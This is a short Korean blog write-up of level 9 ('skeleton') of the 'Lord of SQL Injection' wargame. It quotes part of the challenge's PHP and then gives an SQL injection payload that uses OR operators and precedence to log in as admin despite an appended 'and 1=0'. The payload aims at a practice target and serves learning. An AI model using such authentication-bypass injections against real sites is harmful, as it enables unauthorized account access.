본문 바로가기
웹 해킹/lord of SQL

los 9번

by sonysame 2018. 6. 28.
query : {$query}

"; $result = @mysql_fetch_array(mysql_query($query)); if($result['id'] == 'admin') solve("skeleton"); highlight_file(__FILE__); ?>

뒤에 and 1=0이 박혀있다!


?pw=1' || id='admin' || id='guest' and 1=0


query : select id from prob_skeleton where id='guest' and pw='1' || id='admin' || id='guest' and 1=0


질문 id='guest' and 1=0을 어떻게 해석할 것인가?


'웹 해킹 > lord of SQL' 카테고리의 다른 글

los 11번  (0) 2018.06.28
los 10번  (0) 2018.06.28
los 8번  (0) 2018.06.28
los 7번  (0) 2018.06.28
los 6번  (0) 2018.06.27